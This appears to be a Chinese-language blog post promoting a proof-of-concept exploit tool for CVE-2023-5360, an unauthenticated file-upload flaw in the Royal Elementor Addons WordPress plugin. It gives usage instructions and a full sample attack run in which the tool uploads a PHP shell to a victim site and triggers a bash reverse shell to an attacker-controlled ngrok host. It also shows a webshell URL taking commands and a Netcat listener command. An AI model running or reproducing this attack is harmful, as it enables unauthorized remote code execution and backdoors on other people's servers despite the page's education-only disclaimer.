WordPress插件Royal Elementor Addons文件上传漏洞CVE-2023-5360利用详解

本文详细介绍了WordPress插件Royal Elementor Addons在1.3.79版本之前存在的文件上传漏洞CVE-2023-5360,攻击者可无需认证上传任意文件实现远程代码执行,包含漏洞利用脚本的功能说明和使用方法。

CVE-2023-5360 Elementor文件上传漏洞利用

Royal Elementor Addons and Templates WordPress插件在1.3.79版本之前未正确验证上传文件,允许未认证用户上传任意文件(如PHP文件)并实现远程代码执行(RCE)。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
   _______    ________     
  / ____/ |  / / ____/     
 / /    | | / / __/______  
/ /___  | |/ /__/_____/  
\____/  |___/_____/_____   
  |__ \ / __ \__ \|__  /   
  __/ // / / /_/ / /_ <    
 / __// /_/ / __/___/ /    
/____/\____/____/____/____ 
   / ____/__  // ___// __ \
  /___ \  /_ </ __ \/ / / /
 ____/ /___/ / /_/ / /_/ / 
/_____//____/\____/\____/  

by X3RX3S

描述

这是针对CVE-2023-5360的概念验证利用程序,该漏洞存在于WordPress的Elementor Pro插件中。 它允许未认证攻击者上传任意PHP文件并获得远程代码执行权限。

功能特点

  • 自动获取Elementor nonce值
  • 上传简单Webshell或反向Shell
  • 使用唯一文件名增强隐蔽性
  • 可选的Netcat监听器辅助功能
  • 设计酷炫

使用方法

1
python3 CVE-2023-5360.py <https://victim.site/>

示例:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
python3 CVE-2023-5360.py https://victim.site/


      _______    ________     
     / ____/ |  / / ____/     
    / /    | | / / __/______  
   / /___  | |/ /__/_____/  
   \____/  |___/_____/_____   
       |__ \ / __ \__ \|__  /   
       __/ // / / /_/ / /_ <    
      / __// /_/ / __/___/ /    
     /____/\____/____/____/____ 
         / ____/__  // ___// __ \
        /___ \  /_ </ __ \/ / / /
       ____/ /___/ / /_/ / /_/ / 
      /_____//____/\____/\____/  

         github.com/X3RX3SSec    
      by X3RX3S aka @mindfuckerrrr


[+] 目标: https://victim.site
[+] Elementor页面: https://victim.site)
[*] 步骤1: 获取Elementor nonce值...
[+] 从目标收到HTTP 200响应
[+] 提取的nonce值: fdcb5015cd

[*] 步骤2: 配置payload
  [1] 简单命令Webshell
  [2] 反向Shell (bash)
[?] 选择payload [1/2]: 2
[?] LHOST (你的IP): 7.tcp.eu.ngrok.io
[?] LPORT (你的端口): 31337
[+] 为7.tcp.eu.ngrok.io:31337生成的反向Shell payload
[?] 启动内置监听器? [Y/n]: Y
[+] 在7.tcp.eu.ngrok.io:31337启动本地监听器...

[*] 尝试1/3: 通过AJAX漏洞上传payload...
[>] POST https://victim.site/wp-admin/admin-ajax.php
[any] 31337监听...
[+] 上传处理器返回HTTP 200
[+] Shell已上传: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] 触发反向Shell。请准备好监听器!
[+] 触发信号已发送(反向Shell的超时是正常的)。
[+] 攻击成功!检查你的监听器!🏴‍☠️💣

Payload选项:

  1. 简单命令Webshell(如:https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)
  2. 反向Shell (Bash)

依赖项

  • Python 3.x
  • requests模块

安装依赖:

1
pip install requests

监听器示例

1
nc -lvnp 1337

免责声明

此漏洞利用程序仅用于教育目的和授权的安全测试。 使用者需对自己的行为负责。 仅在拥有所有权或获得测试许可的系统上进行测试。

致谢

作者: X3RX3S CVE-2023-5360

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计